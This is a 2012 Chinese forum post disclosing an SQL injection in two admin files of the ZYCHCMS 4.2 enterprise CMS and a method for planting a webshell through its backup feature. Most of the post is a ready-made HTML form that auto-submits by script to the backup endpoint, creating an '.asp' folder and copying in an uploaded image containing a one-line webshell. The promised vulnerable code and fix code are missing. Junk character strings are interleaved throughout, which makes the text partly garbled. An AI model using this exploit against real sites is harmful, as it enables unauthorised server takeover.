找回密码
 立即注册
查看: 2173|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

- ?7 J8 \0 z+ [9 M  W6 F! L4 e# m3 j) |3 Q
$ E3 G/ ]- C) b  U( |# T- {1 b4 u
& }  l8 m7 C, Q' _' {
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)3 i& h  a  k, E9 S/ Q
①SQL注射漏洞* |, t8 L/ @% W' q/ z# F$ }
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp1 i$ N; T: R- e% l% p
漏洞原因:未过滤. b+ X) h1 V' t, ^$ Q
漏洞代码:
. R; a2 t5 M* k- G4 M6 h# T' ]9 { 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。& |$ P3 h* e% o! P
修复方法:在文件开头加入代码
: n% v1 U$ c3 H1 }' s. W4 x
. B' R6 Y  k: x& ]8 ~8 `2 D. O% I: g3 f/ }* x7 c% V8 u2 N  Z4 V
②后台拿WBSHELL
" E7 P) q4 Z$ V: E3 D# f5 ~ 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
) u1 c+ A5 n! [# |7 X6 B5 ] 这里在网上找了一个,改了下,将就着用。) B, S, _2 x* C
以下是代码本地提交代码
+ r4 t/ \' I: a2 R
5 `8 \- _# w$ r- Z8 e* _4 H" U9 c1 K5 A0 C. U7 \0 o% t
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
: r/ E9 d; ~$ S' N8 E <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>7 r) [) S( b$ `( @0 q0 B0 R
<tr>  a2 S; p7 o0 y2 {* m$ \+ u
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
  F4 c) W! @' w1 |/ c </tr>
! t# E) y3 I4 d2 P <tr>$ X$ p) x  l) d
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>1 T* F9 [5 w* L* {- j" o1 C8 n7 @
</span>4 O# J5 C$ d5 O9 l; Y  ~) R
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
5 K# ^( B8 b% z3 H$ S9 U <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
( t; D9 k$ ^1 G5 ^  j0 V$ P <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>3 K8 C: j2 J4 c
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
  Z# @% ^+ e3 d& ^ <div align=”left”>
9 I$ W7 A+ t2 e9 p8 K$ k: E/ |! m <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />' f9 T) i2 m3 I+ T: u" P. r5 e
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>9 j1 c2 V5 `4 a. U
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />  `/ k- g4 @% U) O
</div></td>/ H  W; W$ N/ X5 p# B7 D& a
</tr>
8 {6 d* e. W$ E' E% t <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
- [: G- q/ W( q! v! v$ A <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>/ r2 u) I2 {  _
<td class=”td”><div align=”left”>- o- b5 A7 j7 ]6 S- r; J
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />6 s3 W* {' N* U' \- w1 w/ Q) {
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
( G4 L& N7 X* G7 U0 w5 x! A </tr>
5 C+ M1 I+ I7 u2 F- l7 B <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
: s* H8 t5 h  w2 O, s# M <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>3 C% y" S' d: E+ L) b
<td class=”td”><div align=”left”>
* q) p" ?; M  @% ~+ t1 G5 @ <input type=”submit” value=”确定备份” class=”btn”
9 o  h/ E1 @) v </div></td>3 P, y( z/ [3 U7 }: |
</tr>8 q; y4 u  A/ x4 F0 N0 C2 X+ J
</table></td></tr></form>
* G! a! R! A+ [6 A& W# a  f </table>
" ^3 z( Q5 m* S' t3 O </td>
7 n& m: q) {1 P0 ~/ H" e </tr>
; d2 V4 m' h" n2 P& A. F </table>
! L8 Q- @+ x% `6 P) L3 j <script>3 E( T5 o: ~$ `. t; I' g
document.all.add.submit();$ q9 ]- L* K3 I" V, L2 A
</script>5 X2 R. u* Y0 w' C% O7 R% n6 z3 y
. L+ I( v" L$ L* ^, U

6 h% d# ^% v3 }+ p! A" n) \5 _" F! }% R

& Z) e2 R( k0 Q7 p. I# a2 d
5 u0 x4 S5 t& e  d
/ w3 O; l+ a; Y* t$ w: [" {( ?) \4 S) {9 u) h' O
, F! y. L' U( }8 Q! F; f# o* j

& E6 s' m9 K; B# w7 [+ {$ s$ v  _' L2 C/ T' h& H) y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表